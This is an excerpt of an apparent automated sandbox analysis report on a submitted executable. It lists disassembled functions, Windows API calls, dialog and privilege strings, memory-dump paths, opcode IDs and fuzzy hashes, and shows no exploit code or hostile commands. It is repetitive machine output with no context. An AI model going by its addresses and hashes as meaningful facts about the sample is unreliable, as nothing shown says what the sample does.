                                                                                              • Associated: 00000000.00000002.1728765089.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ca0000_3AAyq819Vy.jbxd
                                                                                              Similarity
                                                                                              • API ID: _free$ErrorFreeHeapLast
                                                                                              • String ID:
                                                                                              • API String ID: 776569668-0
                                                                                              • Opcode ID: b6f4c9139a27ecfc9b845ae5055163ff170a773b6b67a5a9c24462b3c2a6f084
                                                                                              • Instruction ID: d4256cc0cd3751cb87cc4cc0ae74544b5621e2d75f5be9096a5f0f594c33a364
                                                                                              • Opcode Fuzzy Hash: b6f4c9139a27ecfc9b845ae5055163ff170a773b6b67a5a9c24462b3c2a6f084
                                                                                              • Instruction Fuzzy Hash: CBF01D32905211ABC720EB68F8C6F1B73E9AA00714765181EF11DDB9D2CB70FD80DB64
                                                                                              Function 00CB1FDD Relevance: 7.5, APIs: 5, Instructions: 39COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • _wcslen.LIBCMT ref: 00CB1FE5
                                                                                              • _wcslen.LIBCMT ref: 00CB1FF6
                                                                                              • _wcslen.LIBCMT ref: 00CB2006
                                                                                              • _wcslen.LIBCMT ref: 00CB2014
                                                                                              • CompareStringW.KERNEL32(00000400,00001001,?,?,?,?,00000000,00000000,?,00CAB371,?,?,00000000,?,?,?), ref: 00CB202F
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1728684930.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1728672048.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728711282.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728765089.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ca0000_3AAyq819Vy.jbxd
                                                                                              Similarity
                                                                                              • API ID: _wcslen$CompareString
                                                                                              • String ID:
                                                                                              • API String ID: 3397213944-0
                                                                                              • Opcode ID: 36cd688e7588aeab25b5528f9426693eebd6b0a3a9d04e9ba8da288f3fe00051
                                                                                              • Instruction ID: 149d326dd2253b2c6aba1ed4a8a97a0384ea746fb3a487cad80c6e6fcf056488
                                                                                              • Opcode Fuzzy Hash: 36cd688e7588aeab25b5528f9426693eebd6b0a3a9d04e9ba8da288f3fe00051
                                                                                              • Instruction Fuzzy Hash: F9F01D32008058BBCF226F51FC09ECE7F26EB44760F11C41AF61A9B062CB729661E790
                                                                                              Function 00CC8900 Relevance: 7.5, APIs: 5, Instructions: 30COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • _free.LIBCMT ref: 00CC891E
                                                                                                • Part of subcall function 00CC8DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,00CCC896,?,00000000,?,00000000,?,00CCC8BD,?,00000007,?,?,00CCCCBA,?), ref: 00CC8DE2
                                                                                                • Part of subcall function 00CC8DCC: GetLastError.KERNEL32(?,?,00CCC896,?,00000000,?,00000000,?,00CCC8BD,?,00000007,?,?,00CCCCBA,?,?), ref: 00CC8DF4
                                                                                              • _free.LIBCMT ref: 00CC8930
                                                                                              • _free.LIBCMT ref: 00CC8943
                                                                                              • _free.LIBCMT ref: 00CC8954
                                                                                              • _free.LIBCMT ref: 00CC8965
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1728684930.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1728672048.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728711282.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728765089.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ca0000_3AAyq819Vy.jbxd
                                                                                              Similarity
                                                                                              • API ID: _free$ErrorFreeHeapLast
                                                                                              • String ID:
                                                                                              • API String ID: 776569668-0
                                                                                              • Opcode ID: 71a481b79f49b5145e4a322f4c5a7bb1662e42cceb923f66078ccf27d15b08b0
                                                                                              • Instruction ID: 06d4b425d8ba2133287e5dbe975a36993440e63ea6eedb464d8d67d1c2af345a
                                                                                              • Opcode Fuzzy Hash: 71a481b79f49b5145e4a322f4c5a7bb1662e42cceb923f66078ccf27d15b08b0
                                                                                              • Instruction Fuzzy Hash: 03F01775C136238BC6067F28FC06B2A3BA1F724720342050AF119967B1CB324949ABA5
                                                                                              Function 00CB15FE Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 197COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1728684930.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1728672048.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728711282.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728765089.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ca0000_3AAyq819Vy.jbxd
                                                                                              Similarity
                                                                                              • API ID: _swprintf
                                                                                              • String ID: %ls$%s: %s
                                                                                              • API String ID: 589789837-2259941744
                                                                                              • Opcode ID: 4be05d1d9be8db98dc91f0485aa3ee4252d2eefe6da87314c045088794aec733
                                                                                              • Instruction ID: 4e9a906eb6e86c4aa395811116793f17ef392ae75f239cd6c1490cd396be7a31
                                                                                              • Opcode Fuzzy Hash: 4be05d1d9be8db98dc91f0485aa3ee4252d2eefe6da87314c045088794aec733
                                                                                              • Instruction Fuzzy Hash: 81513931288304F6E6211A918C66FF67365FB16B04FAC4916FFA6750E1C9B3A910B71A
                                                                                              Function 00CC31D6 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 112COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 00CC31FB
                                                                                              • _abort.LIBCMT ref: 00CC3306
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1728684930.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1728672048.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728711282.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728765089.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ca0000_3AAyq819Vy.jbxd
                                                                                              Similarity
                                                                                              • API ID: EncodePointer_abort
                                                                                              • String ID: MOC$RCC
                                                                                              • API String ID: 948111806-2084237596
                                                                                              • Opcode ID: bbf523ad8996d4fe7ff2565f52b1983d9bc6023f902bbc88c963b2f9a4403146
                                                                                              • Instruction ID: 9f9a71642d10421343a15911a4a03655eb7c39fbb4de31f2c4ad2f33bc881ee9
                                                                                              • Opcode Fuzzy Hash: bbf523ad8996d4fe7ff2565f52b1983d9bc6023f902bbc88c963b2f9a4403146
                                                                                              • Instruction Fuzzy Hash: 64415672900289AFCF15DF98DC81FEEBBB5BF08304F188059F915A7262D335AA51DB90
                                                                                              Function 00CA7401 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 103COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog.LIBCMT ref: 00CA7406
                                                                                                • Part of subcall function 00CA3BBA: __EH_prolog.LIBCMT ref: 00CA3BBF
                                                                                              • GetLastError.KERNEL32(?,?,00000800,?,?,?,00000000,00000000), ref: 00CA74CD
                                                                                                • Part of subcall function 00CA7A9C: GetCurrentProcess.KERNEL32(00000020,?), ref: 00CA7AAB
                                                                                                • Part of subcall function 00CA7A9C: GetLastError.KERNEL32 ref: 00CA7AF1
                                                                                                • Part of subcall function 00CA7A9C: CloseHandle.KERNEL32(?), ref: 00CA7B00
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1728684930.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1728672048.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728711282.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728765089.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ca0000_3AAyq819Vy.jbxd
                                                                                              Similarity
                                                                                              • API ID: ErrorH_prologLast$CloseCurrentHandleProcess
                                                                                              • String ID: SeRestorePrivilege$SeSecurityPrivilege
                                                                                              • API String ID: 3813983858-639343689
                                                                                              • Opcode ID: c79abe98e5277218052595f997de195ab3a4f679c6a7a6e791e56edac0e8dbfd
                                                                                              • Instruction ID: 18feaabfaf4649f9179b5a63a2102a57ca59cf2a9b9de2239898d14c6fa22a68
                                                                                              • Opcode Fuzzy Hash: c79abe98e5277218052595f997de195ab3a4f679c6a7a6e791e56edac0e8dbfd
                                                                                              • Instruction Fuzzy Hash: D831B2B1D0429AAEDF11EBA4DC45BEE7BA9BF0A308F044116F815A7282C7748B44DB61
                                                                                              Function 00CBAD10 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 72COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 00CA1316: GetDlgItem.USER32(00000000,00003021), ref: 00CA135A
                                                                                                • Part of subcall function 00CA1316: SetWindowTextW.USER32(00000000,00CD35F4), ref: 00CA1370
                                                                                              • EndDialog.USER32(?,00000001), ref: 00CBAD98
                                                                                              • GetDlgItemTextW.USER32(?,00000066,?,?), ref: 00CBADAD
                                                                                              • SetDlgItemTextW.USER32(?,00000066,?), ref: 00CBADC2
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1728684930.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1728672048.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728711282.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728765089.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ca0000_3AAyq819Vy.jbxd
                                                                                              Similarity
                                                                                              • API ID: ItemText$DialogWindow
                                                                                              • String ID: ASKNEXTVOL
                                                                                              • API String ID: 445417207-3402441367
                                                                                              • Opcode ID: 435dfb811fa6aa8f32926ccb1b7cc034325a6e1b42a841006e685df8772ba475
                                                                                              • Instruction ID: 680eefd3f54c42575355d2a13b01450a714dba3d5cac71e47a408d08e7a74c2f
                                                                                              • Opcode Fuzzy Hash: 435dfb811fa6aa8f32926ccb1b7cc034325a6e1b42a841006e685df8772ba475
                                                                                              • Instruction Fuzzy Hash: B5118E32240200BFE7119FB9DC45FEA7B6DAB4A742F400510F285EB6A0C762AA159736
                                                                                              Function 00CAD8EC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 67COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __fprintf_l.LIBCMT ref: 00CAD954
                                                                                              • _strncpy.LIBCMT ref: 00CAD99A
                                                                                                • Part of subcall function 00CB1DA7: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000200,00000000,00000000,?,00CE1030,00000200,00CAD928,00000000,?,00000050,00CE1030), ref: 00CB1DC4
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1728684930.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1728672048.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728711282.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728765089.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ca0000_3AAyq819Vy.jbxd
                                                                                              Similarity
                                                                                              • API ID: ByteCharMultiWide__fprintf_l_strncpy
                                                                                              • String ID: $%s$@%s
                                                                                              • API String ID: 562999700-834177443
                                                                                              • Opcode ID: f62116c7d6ea670fe366cbade8961c3aabde9d8f7ee0169b9ee8000a91c03cb7
                                                                                              • Instruction ID: 8262c66e347a6dbbd2603ca57d35e7488e3e0309336fb9266e1f3ee48ec31776
                                                                                              • Opcode Fuzzy Hash: f62116c7d6ea670fe366cbade8961c3aabde9d8f7ee0169b9ee8000a91c03cb7
                                                                                              • Instruction Fuzzy Hash: DE21D57294024DAEDB20EEB4CC05FDF3BA8AF02308F040022FA22965A2E631D648DB51
                                                                                              Function 00CB0E46 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 63COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • InitializeCriticalSection.KERNEL32(00000320,00000000,?,?,?,00CAAC5A,00000008,?,00000000,?,00CAD22D,?,00000000), ref: 00CB0E85
                                                                                              • CreateSemaphoreW.KERNEL32(00000000,00000000,00000040,00000000,?,?,?,00CAAC5A,00000008,?,00000000,?,00CAD22D,?,00000000), ref: 00CB0E8F
                                                                                              • CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,?,?,?,00CAAC5A,00000008,?,00000000,?,00CAD22D,?,00000000), ref: 00CB0E9F
                                                                                              Strings
                                                                                              • Thread pool initialization failed., xrefs: 00CB0EB7
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1728684930.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1728672048.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728711282.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728765089.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ca0000_3AAyq819Vy.jbxd
                                                                                              Similarity
                                                                                              • API ID: Create$CriticalEventInitializeSectionSemaphore
                                                                                              • String ID: Thread pool initialization failed.
                                                                                              • API String ID: 3340455307-2182114853
                                                                                              • Opcode ID: 9ed9245b225f10dae415eff89bd5ab6a242e725af646191be29b523822a73b1d
                                                                                              • Instruction ID: e1514ccabb70d98b800b5c7a0e80e94535dca0810ddaa1668dbdaed94097b7c0
                                                                                              • Opcode Fuzzy Hash: 9ed9245b225f10dae415eff89bd5ab6a242e725af646191be29b523822a73b1d
                                                                                              • Instruction Fuzzy Hash: 001151B16407499FC3215F6A9C84AABFBECEBA5754F24482EF1DAC3200D671AA408B50
                                                                                              Function 00CBB270 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 62COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 00CA1316: GetDlgItem.USER32(00000000,00003021), ref: 00CA135A
                                                                                                • Part of subcall function 00CA1316: SetWindowTextW.USER32(00000000,00CD35F4), ref: 00CA1370
                                                                                              • EndDialog.USER32(?,00000001), ref: 00CBB2BE
                                                                                              • GetDlgItemTextW.USER32(?,00000066,?,00000080), ref: 00CBB2D6
                                                                                              • SetDlgItemTextW.USER32(?,00000067,?), ref: 00CBB304
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1728684930.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1728672048.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728711282.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728765089.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ca0000_3AAyq819Vy.jbxd
                                                                                              Similarity
                                                                                              • API ID: ItemText$DialogWindow
                                                                                              • String ID: GETPASSWORD1
                                                                                              • API String ID: 445417207-3292211884
                                                                                              • Opcode ID: 3217e3f9a2751000a8428d5b113db9a81d066e2a2f803916e73fb2b612483405
                                                                                              • Instruction ID: e051b308fb5e1a2865cc015da1d5b982a2200ed9b979200e56e399f243c5705c
                                                                                              • Opcode Fuzzy Hash: 3217e3f9a2751000a8428d5b113db9a81d066e2a2f803916e73fb2b612483405
                                                                                              • Instruction Fuzzy Hash: 4A11A132900219B6DF219EA59D49FFF3B6CEB1A710F000021FA45F6194C7E4AE4597B2
                                                                                              Function 00CBDCDD Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 46COMMON
                                                                                              Download Yara Rule
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1728684930.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1728672048.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728711282.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728765089.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ca0000_3AAyq819Vy.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: RENAMEDLG$REPLACEFILEDLG
                                                                                              • API String ID: 0-56093855
                                                                                              • Opcode ID: f614d5e8d3ea2c83310fc129119a04e29f673bb04d801767cc1925a0c2bd7641
                                                                                              • Instruction ID: 652e798d309e0114abc1cbce5fdfac8c3427ad916123424a2d645cfd8cfb6078
                                                                                              • Opcode Fuzzy Hash: f614d5e8d3ea2c83310fc129119a04e29f673bb04d801767cc1925a0c2bd7641
                                                                                              • Instruction Fuzzy Hash: ED01B176604285AFDB118FA5FC84BEE7BA8F708344F000426F94AC72B0E6309954EBB0
                                                                                              Function 00CC9A1E Relevance: 6.3, APIs: 4, Instructions: 305COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1728684930.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1728672048.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728711282.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728765089.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ca0000_3AAyq819Vy.jbxd
                                                                                              Similarity
                                                                                              • API ID: __alldvrm$_strrchr
                                                                                              • String ID:
                                                                                              • API String ID: 1036877536-0
                                                                                              • Opcode ID: 15e7b98f52cb345e5770fd34cbf54b95dbf5428e1727e1497290f0e3bad33655
                                                                                              • Instruction ID: 3ddc79173d923570fd32f8bc8c14c8ed3518477e9611317a73fea3d610c3c7d2
                                                                                              • Opcode Fuzzy Hash: 15e7b98f52cb345e5770fd34cbf54b95dbf5428e1727e1497290f0e3bad33655
                                                                                              • Instruction Fuzzy Hash: D6A16A729007869FEB21CF28C895FAEBBE5EF51310F2841ADE4969B281C634DE41C751
                                                                                              Function 00CAA354 Relevance: 6.1, APIs: 4, Instructions: 127filetimeCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,?,00000800,?,00CA7F69,?,?,?), ref: 00CAA3FA
                                                                                              • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,00000800,?,?,00000800,?,00CA7F69,?), ref: 00CAA43E
                                                                                              • SetFileTime.KERNEL32(?,00000800,?,00000000,?,?,00000800,?,00CA7F69,?,?,?,?,?,?,?), ref: 00CAA4BF
                                                                                              • CloseHandle.KERNEL32(?,?,?,00000800,?,00CA7F69,?,?,?,?,?,?,?,?,?,?), ref: 00CAA4C6
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1728684930.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1728672048.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728711282.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728765089.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ca0000_3AAyq819Vy.jbxd
                                                                                              Similarity
                                                                                              • API ID: File$Create$CloseHandleTime
                                                                                              • String ID:
                                                                                              • API String ID: 2287278272-0
                                                                                              • Opcode ID: bace8473ae94c089d4813395f167cd689db05f07404f87ade9b682ae54c19f0a
                                                                                              • Instruction ID: 349edb6052ebd4d0dd0aa31a505e8a536f7fb0e840387caed429cb4a93507273
                                                                                              • Opcode Fuzzy Hash: bace8473ae94c089d4813395f167cd689db05f07404f87ade9b682ae54c19f0a
                                                                                              • Instruction Fuzzy Hash: D641BE312483829AD731DF24DC55BEEBBE4AB86708F044919F5E193190D7A4EB48DB53
                                                                                              Function 00CA1100 Relevance: 6.1, APIs: 4, Instructions: 119COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1728684930.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1728672048.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728711282.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728765089.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ca0000_3AAyq819Vy.jbxd
                                                                                              Similarity
                                                                                              • API ID: _wcslen
                                                                                              • String ID:
                                                                                              • API String ID: 176396367-0
                                                                                              • Opcode ID: eaa09e3db95182a35686adc9cfe90df2ce0f1dfc98ce45082ad96d0dd7204999
                                                                                              • Instruction ID: e6e9339e5ef908823efbe2301ab14b33c31b6b0292d7379b13629297f1f66f90
                                                                                              • Opcode Fuzzy Hash: eaa09e3db95182a35686adc9cfe90df2ce0f1dfc98ce45082ad96d0dd7204999
                                                                                              • Instruction Fuzzy Hash: 874191B190166A9BCB259F68CC4AAEF7BBCEF01310F04412DFD45F7245DA30AE558BA4
                                                                                              Function 00CCC988 Relevance: 6.1, APIs: 4, Instructions: 110COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00CC91E0,?,00000000,?,00000001,?,?,00000001,00CC91E0,?), ref: 00CCC9D5
                                                                                              • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00CCCA5E
                                                                                              • GetStringTypeW.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00CC6CBE,?), ref: 00CCCA70
                                                                                              • __freea.LIBCMT ref: 00CCCA79
                                                                                                • Part of subcall function 00CC8E06: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00CCCA2C,00000000,?,00CC6CBE,?,00000008,?,00CC91E0,?,?,?), ref: 00CC8E38
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1728684930.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
